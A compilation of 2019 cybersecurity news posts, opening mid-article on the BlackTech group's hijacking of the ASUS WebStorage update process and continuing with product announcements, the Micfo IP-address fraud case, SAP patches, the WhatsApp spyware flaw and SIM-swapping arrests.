During the update mechanism for ASUS WebStorage, the client sent a request to the server to request the update, in turn the server responds in XML format, with a guid and a link included in the response. The software then checks if the installed version is older, based on the information in the guid element, and requests the update binary via the provided link. 

“Therefore, attackers could trigger the update by replacing these two elements using their own data. This is the exact scenario we actually observed in the wild. attackers inserted a new URL, which points to a malicious file at a compromised domain,” says ESET. 

The attackers serve a Plead sample that acts as a first-stage downloader that fetches a fav.ico file from a server, whose name mimics the official ASUS WebStorage server. The downloaded file contains a PNG image and data used by the malware, which is located right after PNG data

The second-stage loader writes itself to the Start Menu startup folder to gains persistence. The loader executes shellcode in memory to load the third-stage DLL, the TSCookie.

“We see that supply-chain and man-in-the-middle attacks are used more and more often by various attackers all around the globe.” ESET concludes.  “This is why it’s very important for software developers not only to thoroughly monitor their environment for possible intrusions, but also to implement proper update mechanisms in their products that are resistant to MitM attacks,”

Pierluigi Paganini

(SecurityAffairs – Plead Backdoor, Zero-day, BlackTech group)

The post BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor appeared first on Security Affairs.

Identity theft victims could lead us to accept more security-improving friction

Far too many individuals who have never been victims of identity theft and financial crimes don’t understand how devastating those are to victims. “There are many victim services organizations that assist violent crime victims and the understanding of the trauma and the victim experience is not questioned (which is very appropriate and as it should be),” Eva Velasquez, president and CEO of the Identity Theft Resource Center (ITRC), told Help Net Security. After all, we … More

The post Identity theft victims could lead us to accept more security-improving friction appeared first on Help Net Security.

CISOs: What would you do over?

Just after the new year I was catching up with a CISO over lunch in Pike Place Market in Seattle. We were reminiscing about how tough it is to get a security program up and running in the beginning. Pausing to dip his taco in the excellent house salsa, he commented, “Y’know, if I had to do it all over again…” and he proceeded to tell me a story. My brain twitched with possibilities—here was … More

The post CISOs: What would you do over? appeared first on Help Net Security.

Fundamental Need For A Productive ITSM (IT Service Management)

It is true that many business departments have introduced various cloud services that realize advanced IT and those do not require the power of the information system department. But the information systems department itself has to change too. It is necessary to move away from the concept of managing IT systems as before and shift its mission to a business partner who provides useful IT services as customers to all users in the company. IT service management holds the key. It standardizes, visualizes and automates each business process that has been made based on personal judgment or occasional judgment from time to time, improves the quality of IT services, eliminates unnecessary work, and eliminates the unnecessary work. Streamline your work.

So how can we introduce and practice proper IT service management? If you do not have experience or knowledge in your company, you do not know where to start, what to do, and what to do. A useful tool in such a situation is to learn and reference best practices in the world’s leading companies. As a guideline, a framework called the Information Technology Infrastructure Library (ITIL) is well known. From a different point of view, applying the concept of IT service management based on ITIL to all business divisions will enable information systems division to regain its leadership again. This is a great opportunity.

In recent years, all companies are accelerating transformation, such as the manufacturing industry, which has been focused on making a limit on manufacturing, accelerating its conversion to a service model. In order to be competitive in the wave of this digital transformation, it is possible to quickly launch strategic IT services even if the future cannot be seen and to improve operation and correct the trajectory according to environmental changes. In some cases, it will be necessary to take flexible measures like never before, such as linking with other companies’ services and promoting co-creation without hesitation. As a support role for business departments and managers, the information systems department has had unprecedented expectations. The first step of ITIL introduction is from the service desk.

In the previous version of V2 , ITIL centered on two major guidelines:

  • Service support that describes daily operation methods
  • Service delivery that describes medium- and long-term service management methods.

In the latest V3 , while following these two ideas, the classification is a concept based on five core principles:

  1. Service strategy
  2. Service design
  3. Service transition
  4. Service operation
  5. Continuous service improvement.

Each indicates the ideal state of each process of IT service, but among these:

  • Service Desk
  • Incident Management
  • Problem Management
  • Change Management Release Management
  • Configuration Management
  • Service Level Management
  • IT Service Financial Management
  • Capacity Management
  • IT Service Continuity Management
  • Availability Management

The above-mentioned parts of ITSM are important concepts for a well-oiled IT organization for any size business. The starting point of these processes is the service desk. Among the Fortune 500 companies, ITIL began to spread in the early 2000s, but more than half of them started the service desk. The reason is that it is the fastest and most visible effect on improving the quality of IT services.

In fact, looking at the current state of the service desk, it’s not uncommon to find workflows that use email or phone interaction. Users can not even see what their request status is now. On the other hand, the manager or head of each department cannot grasp what is stumped by the person in charge at the business site, and the fact is that even if you prioritize the issues, the information to judge them is not gathered. Establishing a workflow for IT service management that is optimal for the entire company by introducing measures to improve the operational workflows of inefficient service desks first, while looking ahead of the system operation management corresponding to the latest technology, user satisfaction.

All providers of ITSM services boast their SLA levels and competitive price points for their potential customers. Companies need to do their homework of researching about the track records of firms that are competing, check reviews from current clients to determine the capability of the service provider. There are lots of things beyond the scope of this article, but there is one thing in common for all ITSM service providers, those are also “for-profit” businesses. These organizations are profit-seeking endeavors as well, which seeks to earn as much profit and do its best to reduce cost as much as possible. A clear understanding of the pros and cons of available competing service providers need to be done by a competent IT team within the organization.


Related Resources:

The 10 Best Managed Security Service Providers in 2019

Managed Service Providers in the Era of Ransomware


The post Fundamental Need For A Productive ITSM (IT Service Management) appeared first on .

When all else fails, organizations realize they must share threat intel

A large majority of security IT decision makers are ready and willing to share valuable threat intelligence data to help the collective industry make better, more informed decisions when it comes to cyber attacks, an IronNet Cybersecurity report reveals. To compile the “Collective Offense Calls for a Collective Defense: A Reality Check for Cybersecurity Decision Makers” report, IronNet commissioned survey firm Vanson Bourne to interview 200 U.S. security IT decision makers across many industries including … More

The post When all else fails, organizations realize they must share threat intel appeared first on Help Net Security.

Personalized Scams

Cyber criminals now have a wealth of information on almost all of us. With so many hacked organizations now a days, cyber criminals simply purchase databases with personal information on millions of people, then use that information to customize their attacks, making them far more realistic. Just because an urgent email has your home address, phone number or birth date in it does not mean it is legitimate.

CEOs and business leaders trust AI, but employees are more cautious

Most senior executives (85%) classify themselves as artificial intelligence (AI) optimists, citing increased investment and trust in the technology. Eighty-seven percent say their company will invest in AI initiatives this year, the EY study reveals. The data was collected via an online study conducted by Engine on behalf of EY among a sample of 500 US CEOs and business leaders ages 21 and older who work for a company with US$25m–US$50m in revenue or US$50m … More

The post CEOs and business leaders trust AI, but employees are more cautious appeared first on Help Net Security.

The six biggest cybersecurity risks facing the utilities industry

The utilities industry is rapidly modernizing its infrastructure, adding more digitized equipment and connectivity across devices, plants, and systems. This evolution to “smart infrastructure” represents a positive, paradigm shift for the industry. Unfortunately, the security policies of many utilities have not evolved along with it, leaving them incredibly vulnerable. Utilities are investing heavily to modernize infrastructure. In fact, ABI Research projects that the industry will spend US$14 billion a year between 2018 and 2023 — … More

The post The six biggest cybersecurity risks facing the utilities industry appeared first on Help Net Security.

Trend Micro unveils cloud-native security customized to the demand of DevOps

Trend Micro, a global leader in cybersecurity solutions, announced the availability of the industry’s most complete security from a single solution protecting across cloud and container workloads. This leadership has been achieved through newly launched container security capabilities added to Trend Micro Deep Security to elevate protection across the entire DevOps lifecycle and runtime stack. From virtual servers and data centers to public and private cloud workloads, containers are increasingly used and demand protection. Leading … More

The post Trend Micro unveils cloud-native security customized to the demand of DevOps appeared first on Help Net Security.

LogRhythm launches a cloud-based version of its NextGen SIEM Platform

LogRhythm, the company powering the world’s most modern enterprise security operations centers (SOCs), announced that it has released a cloud-based version of its NextGen SIEM Platform: LogRhythm Cloud. LogRhythm’s NextGen SIEM Platform is already used by some of the world’s largest and best-known enterprises. Collecting and analyzing trillions of security events and threat indicators each week, LogRhythm enables precise detection and accelerated neutralization of sophisticated cyberthreats for SOCs across the globe. These benefits are driven … More

The post LogRhythm launches a cloud-based version of its NextGen SIEM Platform appeared first on Help Net Security.

Verint’s Luminar to boost security resilience through a proactive customer-centric defense approach

Verint Systems, a global provider of data mining software for cyber security and intelligence, announced that it has launched Luminar, a new Cyber Threat Intelligence software solution that boosts security resilience through a proactive customer-centric defense approach. Luminar was introduced at Verint’s Cyber Intelligence’s Annual User Forum that took place in Italy and is another addition to Verint’s Cyber Intelligence wide portfolio. Luminar aggregates data from surface, deep and dark web sites, social networks and … More

The post Verint’s Luminar to boost security resilience through a proactive customer-centric defense approach appeared first on Help Net Security.

Karamba’s autonomous security solution protects connected devices and systems against attacks

Karamba Security, a world-leading provider of embedded cybersecurity for the automotive industry, announced that its autonomous security solution is being used to protect connected devices and systems across a broad spectrum of vertical markets facing similar large-scale cybersecurity threats. Following successful deployments of Karamba’s embedded, self-protecting and auto-recovery software technology in the automotive industry — including more than 32 engagements with car manufacturers and tier-1 automotive suppliers — manufacturers in other vertical markets have sought … More

The post Karamba’s autonomous security solution protects connected devices and systems against attacks appeared first on Help Net Security.

The Latest Techniques Hackers are Using to Compromise Office 365

It was only a few years back that cloud technology was in its infancy and used only by tech-savvy, forward-thinking organisations. Today, it is commonplace. More businesses than ever are making use of cloud services in one form another. And recent statistics suggest that cloud adoption has reached 88 percent. It seems that businesses now […]… Read More

The post The Latest Techniques Hackers are Using to Compromise Office 365 appeared first on The State of Security.

A Simple Data Breach Guide (Interpreting GDPR)

Perhaps it’s too melodramatic to claim that the debate over how to define a data breach “rages on” because we haven’t seen bodies flying out of windows yet, but it is a serious question with genuine financial ramifications now that the General Data Protection Regulation (GDPR) and its accompanying fines for mishandling data have arrived […]… Read More

The post A Simple Data Breach Guide (Interpreting GDPR) appeared first on The State of Security.

Keysight Technologies unveils new integrated network analyzers

Keysight Technologies, a leading technology company that helps enterprises, service providers and governments accelerate innovation to connect and secure the world, launched the next generation of network analyzers which deliver reliability and repeatability with best-in-class dynamic range, trace noise and temperature stability, as well as a wide range of software applications, enabling engineers to consistently achieve comprehensive device characterization. High-speed digital, wireless, aerospace and defense, and automotive companies need integrated active and passive components for … More

The post Keysight Technologies unveils new integrated network analyzers appeared first on Help Net Security.

Arm debuts eMRAM-enabled test chip and board on Samsung Foundry process technology

At the Samsung Foundry Forum, Arm, in collaboration with Samsung Foundry, Cadence, and Sondrel, demonstrated the first 28nm fully-depleted silicon-on-insulator (FD-SOI) embedded MagnetoResistive Random Access Memory (eMRAM) IoT test chip and development board. The Musca-S1 is designed to offer more choice to IoT designers in their system-on-chip (SoC) development journey. Designers can now easily implement more secure, holistic IoT solutions, enabling them to focus more on core product differentiation and accelerating time-to-market. “The promise of … More

The post Arm debuts eMRAM-enabled test chip and board on Samsung Foundry process technology appeared first on Help Net Security.

MarkLogic adds new features to its Data Hub 5.0 and MarkLogic 10

MarkLogic Corporation, the next generation data platform provider for simplifying data integration, announced Embedded Machine Learning and other features in the latest versions of the enterprise-grade MarkLogic Data Hub 5.0 and the MarkLogic 10 multi-model database. The enhancements make MarkLogic’s full stack offering an unparalleled enterprise solution for integrating, curating, securing, analyzing and acting on business-critical data as MarkLogic pushes the limits of modern data integration. The MarkLogic Data Hub, running in the cloud or … More

The post MarkLogic adds new features to its Data Hub 5.0 and MarkLogic 10 appeared first on Help Net Security.

3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, cybercriminals first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that solves for the problem – which means users will fix the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind now and in the future when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up-to-date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important you’re always careful of sharing personal data. Never exchange financial information or crucial personal details over the app, as they can possibly be stolen in the chance your device does become compromised with spyware or other malware.
  • Protect your mobile phones from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

Sigma Systems expands its cloud-first strategy with Microsoft Azure

Sigma Systems, the global leader in catalog-driven software, is pleased to announce the expansion of its cloud-first strategy with deployment of its award-winning Create-Sell-Deliver portfolio on Microsoft Azure. With Sigma’s already strong base of cloud customers and a deepening commitment and enhanced integration to Microsoft Dynamics 365, the commitment to Azure further strengthens Sigma’s cloud-first strategy and unlocks new opportunities across multiple industries in collaboration with Microsoft. Tim Spencer, President and CEO, Sigma Systems, commented: … More

The post Sigma Systems expands its cloud-first strategy with Microsoft Azure appeared first on Help Net Security.

The Limitless Possibilities of IoT and Its Shortcomings

Imagine living in a world where smart refrigerators, autonomous driving vehicles, or self-regulated temperature homes are no longer pipe dreams. This type of futuristic society is coming to a life near you through the advent of the Internet of Things (IoT).

This is a technology revolution that has already begun as the IoT market is growing at an explosive rate. To be precise, by the year 2020, the IoT market is expected to become a $457B market with annual growth rates of close to 30%. The assimilation of IoT appliances and devices is a matter of when, not if.

However, what exactly are the benefits of having IoT so closely integrated in our lives, but more importantly, what are the drawbacks? This is what we hope to uncover below.

Refresh My Memory—What is IoT?

IoT describes any device that has the ability to connect to the internet, which opens the doors for unique ways to interact with their devices.

For instance, have you ever wished your car would be able to tell you exactly when to get an oil change or when to replace your tires? How about if your refrigerator could tell you what food items are low in stock and could self-order more for online delivery? These are just simple examples of how IoT could shape and influence our lives moving forward.

We’ve become so accustomed to thinking computers, phones, or TVs are the only products capable of retrieving data from the internet. This just simply isn’t the case anymore.

As more mobile networks continue to grow and provide proper coverage to all users, it’s only inevitable that we begin seeing a diverse range of appliances that can begin connecting to the internet. The next wave of appliances, such as connected/autonomous vehicles, will drive innovation in the future.

How Can IoT Improve Our Lives?

The possibilities are essentially endless when it comes to how IoT can shape our lives. Take, for example, how IoT could improve the efficiency of a simple lightbulb.

In the past, lightbulbs were neither energy efficient and provided no sense of reliability in terms of when they would ultimately burn out. Through IoT advancements, smart light bulbs will now be able to connect to our mobile devices to display its current energy consumption, costs, time to expiration, and remote control capabilities.

IoT could also get as complicated as planning entire smart city infrastructure, such as driverless public transportation systems, efficient means of urban water usage, safer pedestrian traffic monitoring, or incredibly energy efficient buildings.

Singapore is actually one of the leaders in the smart city adoption market and hopes to become one of the world’s first complete smart nations. One of their top priorities is to make transportation fast, safe, and more efficient to cater to its needs as a major global business hub.

Singapore plans to feature fully autonomous vehicles and buses by 2022. This coupled with IoT powered traffic sensors, radars, and state of the art cameras will make Singapore one of the safest public infrastructures in the world for its everyday citizens.

Although the potential for IoT is limitless, so too are its possible drawbacks. Here is a quick examination of some of the major hurdles that the IoT industry must overcome in order to fully maximize its effectiveness.

With Great Power Comes Great Responsibility

Although IoT technologies can help our lives in many ways, there could be some roadblocks, such as privacy and security concerns, that need to be sorted out in order to achieve proper mass adoption.

5g networks mobile device


As with any sort of device connected to the internet, speed will always be a constant worry on the back of users’ minds.

Latency could play a major role in the slow initial rollout of city wide IoT initiatives due to the need to be constantly connected to the internet with enormous needs for always-on data. At this current rate, we’d be hard pressed to have autonomous public buses drive through inclement weather through 4G technology. The need for faster and more stable connections will be a must.

A lot of these concerns could be alleviated with the launch of 5G networks, but 5G rollout will be quite slow, especially with the concern that its wave range will be much shorter than 4G/LTE range capabilities.


A few years back, one of the hottest concepts coming out of the IoT field was the potential for connected cars of the future. By having internet ready vehicles, drivers would be able to automatically detect when to get their oil changed, whether their airbags are fully engaged and properly working, remotely control their vehicles through a mobile phone, etc.

However, one huge oversight with this concept was the fact that leaving an automobile exposed over the internet was begging hackers to take control of users’ vehicles. This instantly made automobiles one of the most sought after hacking targets of cyber criminals around the world.

Hackers could, in effect, perform a hostile remote takeover of your vehicle to cut your brakes whenever they pleased, blast the heat during hot summer days, lock you out of your car, etc.

Since then, it has become apparent that connected cars must be properly secured, but this certainly was not an area of expertise of car manufacturers. Security for connected cars is still a visible problem today since most of the data is exchanged via different communications protocols as a basic website or mobile network.

The challenge will be finding solutions that can effectively protect the communications protocols for a wide array of IoT appliances, such as automobiles, traffic lights, refrigerators, etc., which is why Cloudbric is one solution that is looking to integrate cybersecurity across a wide array of protocols to help bring forth a more safer and connected future.

privacy internet of things


Another major hurdle of IoT will simply be the idea of having so many connected devices in our everyday lives. Living in a society where every electronic device or appliance is constantly monitoring your usage and data can be quite unsettling for some people who place a high importance on personal privacy. This can lead to issues such as corporate surveillance and having companies too closely integrated into our lives.

In order for IoT applications and technology to fully take off, manufacturers and governmental institutions need to prove to the public the actual merits of IoT and how this will better the lives of everyone involved. Rolling out innovative technology that is not fully vetted for security or could lead to potential data leaks would be a disaster that would take takes to recover from.

Furthermore, the concept of running a smart city or nation would be asking users to give up a portion of their personal privacy without their knowledge or consent. This is simply recording the actions and habits of a city’s co-inhabitants without their permission. Major IoT players need to come up with strategies that help ease this concern in order for IoT to become a mainstay.

The upcoming IoT wave is inevitable, which can present the world with many benefits that we could have only dreamed were possible in the past. The key hurdle here is that companies need to fully prepare for the obvious issues that reside (security, speed, and privacy) and also simultaneously gear up for potentially unknown issues that may arise (failure of critical IoT systems leading to potential accidents). By having proper protocols in place for now and for the future, it is safe to assume that IoT technology will certainly be the way of the future.

Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post The Limitless Possibilities of IoT and Its Shortcomings appeared first on Cloudbric.

Alcide launches continuous security and hygiene scanner for Kubernetes and Istio

Alcide, the cloud-native network security leader empowering DevSecOps with code-to-production continuous security for workloads running on Kubernetes, announced the release of Alcide Advisor. Alcide Advisor is a continuous security & hygiene scanner for Kubernetes & Istio, which automatically scans for the widest range of compliance, security and governance risks and vulnerabilities. Already deployed in numerous customer environments, and fully integrated with the CI/CD pipeline, it empowers engineering teams to maintain engineering motion and quickly identify … More

The post Alcide launches continuous security and hygiene scanner for Kubernetes and Istio appeared first on Help Net Security.

Syncsort and Snowflake to support growing demand for advanced cloud analytics

Syncsort, the global leader in Big Iron to Big Data software, announced seamless data integration with Snowflake, provider of the only data warehouse built for the cloud. The new integration will enable mutual customers to access, transform and deliver critical customer and financial data from the mainframe to Snowflake for advanced analytics. As the system of record for many large organizations, mainframe data provides key insights that support top business use cases such as new … More

The post Syncsort and Snowflake to support growing demand for advanced cloud analytics appeared first on Help Net Security.

TELUS completes successful testing of Neustar’s STIR/SHAKEN solution

Neustar, a trusted, neutral provider of real-time information services, and TELUS, one of Canada’s largest telecommunications companies, announced a successfully completed test of Neustar’s Certified Caller software suite deployed in TELUS’s NFV lab environment to authenticate and verify calls using the STIR/SHAKEN protocol. This significant milestone supports the Canadian Radio-Television and Telecommunications Commission (CRTC) request of telecommunications service providers to deploy caller ID authentication and verification for voice over internet (VoIP) calls to reduce illegal … More

The post TELUS completes successful testing of Neustar’s STIR/SHAKEN solution appeared first on Help Net Security.

The Sad State of New Zealand’s Cyber Attack Readiness

The New Zealand Financial Innovation & Technology Association (FinTechNZ), a financial-technology organization has exposed the alarming situation of companies based on New Zealand, only around 6% have a reasonable level of cybersecurity defense infrastructure and readiness in place. Such level is very low considering the number of multinational companies having a local branch office in New Zealand and the eagerness of the government to comply with its internal IT security arrangements for both itself and businesses operating within the country’s territory.

“We need to increase protection against attacks, especially bearing in mind that more than 90 percent of New Zealand companies are small businesses. New Zealand is not exempt from major cyber-attacks which could impinge on the economy and livelihood as a nation. We need to understand the multi-dimensional nature of cyber threats and key issues that government and private sector face,” explained James Brown, FintechNZ’s General Manager.

New Zealand’s NCSC has observed at least 347 cases of cybersecurity breaches and cyber attacks from their latest record dated July 2017 to June 2018, with a majority of which were not perpetrated by professional private hacking groups, but rather hacking groups allegedly funded by rogue states.

“Cyber risks are a borderless challenge and we can always improve on national preparedness in our cyber-attack strategy. We want to ensure the cybersecurity of our national infrastructures, our businesses and people. Cyber-crime is rising and is increasingly being identified as a top threat to New Zealand, as criminals, rogue nations and others in the darknet seek to strike and disrupt at any moment. The tech sector epitomises Kiwi ingenuity and entrepreneurial flair. With exports amounting to nearly $7 billion and total revenue predicted exceeding $10 billion in 2017, the industry is an integral part of the New Zealand economy,” concluded Brown.

Unlike the nuclear arms race during the early cold war to the late ’90s, cyberwarfare is raging for quite a while now between states without the knowledge of an ordinary person. Also known as cyber espionage and digital hijacking, various countries involved with cyber warfare have their own goals in mind, hence very difficult to read why they are doing it against other nations.

Also, Read:

Cyber Attacks Stopped By An Israeli Bomb

How to Protect Yourself from Online Cyber Attacks at Work

Yet Again! Cyber Attack on Toyota Car Maker

Australia’s Election Proposal To Combat Cyber Attack

1 Million Swiss Devices Victim Of Cyber Attack



The post The Sad State of New Zealand’s Cyber Attack Readiness appeared first on .

Mastercard’s new API based digital platform integrates fintech solutions and Mastercard capabilities

Mastercard introduced the Mastercard Innovation Engine, an API based digital platform that enables issuers and merchants a simplified path to rapidly deploying digital capabilities and experiences to their customers. The plug-and-play platform seamlessly brings together Mastercard assets and financial-technology services to deliver unique and digitally integrated solutions and consumer experiences through a single connection. The platform facilitates collaboration and drive continuous innovation across the ecosystem. “Consumer expectations are changing rapidly and as a result we … More

The post Mastercard’s new API based digital platform integrates fintech solutions and Mastercard capabilities appeared first on Help Net Security.

A Tough Week for IP Address Scammers

In the early days of the Internet, there was a period when Internet Protocol version 4 (IPv4) addresses (e.g. were given out like cotton candy to anyone who asked. But these days companies are queuing up to obtain new IP space from the various regional registries that periodically dole out the prized digits. With the value of a single IP hovering between $15-$25, those registries are now fighting a wave of shady brokers who specialize in securing new IP address blocks under false pretenses and then reselling to spammers. Here’s the story of one broker who fought back in the courts, and lost spectacularly.

On May 14, South Carolina U.S. Attorney Sherri Lydon filed criminal wire fraud charges against Amir Golestan, alleging he and his Charleston, S.C. based company Micfo LLC orchestrated an elaborate network of phony companies and aliases to secure more than 735,000 IPs from the American Registry for Internet Numbers (ARIN), a nonprofit which oversees IP addresses assigned to entities in the U.S., Canada, and parts of the Caribbean.

Interestingly, Micfo itself set this process in motion late last year when it sued ARIN. In December 2018, Micfo’s attorneys asked a federal court in Virginia to issue a temporary restraining order against ARIN, which had already told the company about its discovery of the phony front companies and was threatening to revoke some 735,000 IP addresses. That is, unless Micfo agreed to provide more information about its operations and customers.

At the time, many of the IP address blocks assigned to Micfo had been freshly resold to spammers. Micfo ultimately declined to provide ARIN the requested information, and as a result the court denied Micfo’s request (the transcript of that hearing is instructive and amusing).

But by virtue of the contract Micfo signed with ARIN, any further dispute had to be settled via arbitration. On May 13, that arbitration panel ordered Micfo to pay $350,000 for ARIN’s legal fees and to cough up any of those 735,000 IPs the company hadn’t already sold.

According to the criminal indictment in South Carolina, in 2017 and 2018 Golestan sold IP addresses using a third party broker:

“Golestan sold 65,536 IPv4 addresses for $13 each, for a total of $851,896,” the indictment alleges. “Golestan also organized a second transaction for another 65,536 IP addresses, for another approximately $1 million. During this same time period, Golestan had a contract to sell 327,680 IP addresses at $19 per address, for a total of $6.22 million” [this last transaction would be blocked.]

The various front companies alleged to have been run by Micfo and Amir Golestan.

Mr. Golestan could not be immediately reached for comment. Golestan’s attorney in Micfo’s lawsuit against ARIN declined to comment on either the criminal charges or the arbitration outcome. Calls to nearly a dozen of the front companies named in the dispute mostly just rang and rang with no answer, or went to voicemail boxes that were full.

Stephen Ryan is a Washington, D.C.-based attorney who represented ARIN in the dispute filed by Micfo. Ryan said this was the first time ARIN’s decision to revoke IP address space resulted in a court battle — let alone arbitration.

“We have revoked addresses for fraud before, but that hasn’t previously resulted in litigation,” Ryan said. “The interesting thing here is that they litigated this for five months.”

According to a press release by ARIN, “Micfo obtained and utilized 11 shelf companies across the United States, and intentionally created false aliases purporting to be officers of those companies, to induce ARIN into issuing the fraudulently sought IPv4 resources and approving related transfers and reassignments of these addresses. The defrauding party was monetizing the assets obtained in the transfer market, and obtained resources under ARIN’s waiting list process.”

“This was an elaborate operation,” said Ryan, a former federal prosecutor. “All eleven of these front companies for Micfo are still up on the Web, where you see all these wonderful people who allegedly work there. And meanwhile we were receiving notarized affidavits in the names of people that were false. It made it much more interesting to do this case because it created 11 states where they’d violated the law.”

The criminal complaint against Golestan and Micfo (PDF) includes 20 counts of wire fraud associated with the phony companies allegedly set up by Micfo.

John Levine, author of The Internet for Dummies and a member of the security and stability advisory committee at ICANN, said ARIN does not exactly have a strong reputation for going after the myriad IP address scammers allegedly operating in a similar fashion as Micfo.

“It is definitely the case that for a long time ARIN has not been very aggressive about checking the validity of IP address applications and transfers, and now it seems they are somewhat better than they used to be,” Levine said. “A lot of people have been frustrated that ARIN doesn’t act more like a regulator in this space. Given how increasingly valuable IPv4 space is, ARIN has to be more vigilant because the incentive for crooks to do this kind of thing is very high.”

Asked if ARIN would have the stomach and budget to continue the fight if other IP address scammers fight back in a similar way, Ryan said ARIN would not back down from the challenge.

“If we find a scheme or artifice to defraud and it’s a substantial number of addresses and its egregious fraud, then yes, we have a reserve set aside for litigation and we can and will use it for cases like this,” Ryan said, adding that he’d welcome anyone with evidence of similar schemes to come forward. “But a better strategy is not to issue it and never have to go back and revoke it, and we’re good at that now.”

SAP Security Patch Day for May 2019 fixes many missing authorization checks

SAP released SAP Security Patch Day for May 2019 that includes 8 Security Notes, 5 of which are updates to previously released Notes.

Five Security Notes included in SAP Security Patch Day for May 2019 addressed missing authorization checks in SAP products, including Treasury and Risk Management, Solution Manager and ABAP managed systems, dbpool administration, and Enterprise Financial Services. 

“Today, being the second Tuesday of the month, SAP released May’s Security Notes. This month, there are no critical or Hot News notes published, but there are three High Priority Notes, as well as two other SAP Security Notes affecting SAP Solution Manager (reported by the Onapsis Research Labs).” reads a blog post published by SAP security firm Onapsis. “This month, 50% of the patches are Missing Authorization Checks, which is higher than the average 15%. Even though this is one of the most common vulnerabilities in SAP software.”

SAP Security Patch Day May 2019

SAP also released five Security Notes to address information disclosure vulnerabilities in several products, including BusinessObjects and Solution Manager. 

The Security Note is related to a privilege escalation issue (CVE-2019-0301) in SAP Identity Management REST Interface Version, this is the only Note rated as High priority, while the remaining 12 are rated Medium.

“Under certain conditions, it is possible to request the modification of role or privilege assignments through SAP Identity Management REST Interface Version 2, which would otherwise be restricted only for viewing.” reads the security advisory for the CVE-2019-0301.

This is the most severe flaw, it received a CVSS score of 8.4.

Two flaws received a CVSS score of 6.3, they are an information disclosure in BusinessObjects business intelligence platform (CVE-2019-0287), and a missing authorization check in Treasury and Risk Management (CVE-2019-0280).

SAP published updates for Security Notes released in October 2009, September 2010, December 2010, and March 2013.

“A total of 11 Security Notes were published in May and an additional three in late April after last month’s Patch Tuesday, represented in these types: Missing Authorization Checks (the most common type of vulnerability in SAP software), Information Disclosure, Cross-Site Scripting (XSS) and Privilege Escalation.” adds Onapsis.

Pierluigi Paganini

(SecurityAffairs – SAP Security Patch Day for May 2019)

The post SAP Security Patch Day for May 2019 fixes many missing authorization checks appeared first on Security Affairs.

Privacy Intelligence News & Insights: CCPA Amendments Overview

State Legislators continue to consider amendments to the California Consumer Privacy Act amidst uncertainty over how companies will meet the requirements, which go into effect January 1, 2020. Late last month six bills were advanced in the California Assembly that would greatly impact the force and effect of the CCPA as it was enacted almost a year ago. On April 23, 2019, the Privacy and Consumer Protection Committee passed these industry-backed amendments: AB 25, Chau: Expressly excludes contractors, agents, and job applicants from the definition of employees, to the extent their personal information is used for purposes compatible with that … Continue reading Privacy Intelligence News & Insights: CCPA Amendments Overview

The post Privacy Intelligence News & Insights: CCPA Amendments Overview appeared first on TrustArc Blog.

WhatsApp Vulnerability Fixed

WhatsApp fixed a devastating vulnerability that allowed someone to remotely hack a phone by initiating a WhatsApp voice call. The recipient didn't even have to answer the call.

The Israeli cyber-arms manufacturer NSO Group is believed to be behind the exploit, but of course there is no definitive proof.

If you use WhatsApp, update your app immediately.

Feds Break Up Major SIM-Hijacking Ring

The U.S. Department of Justice announced that it has arrested and charged members of a major cybercriminal ring in connection with $2.4 million worth of wire fraud and identity theft.

The hacking group, called “The Community” primarily used social engineering (trickery) and SIM card hijacking to steal funds and cryptocurrency from their victims.

SIM swapping or hijacking is an attack that often deploys personal information gleaned from other sources (such as social engineering) to authenticate a fraudster to a mobile phone company. Once authenticated, the mobile phone number of the target victim is moved to the criminal’s phone. Possession of the target’s phone number allows the criminal to access calls and texts intended for the target, therefore making it possible to bypass his or her 2-Factor authentication and thus gain access to the victim’s financial accounts.

Members of The Community face charges of wire fraud and aggravated identity theft. Three former mobile provider employees are also charged with accepting bribes to facilitate SIM-card hijacks for the group.

Read more about the story here.




The post Feds Break Up Major SIM-Hijacking Ring appeared first on Adam Levin.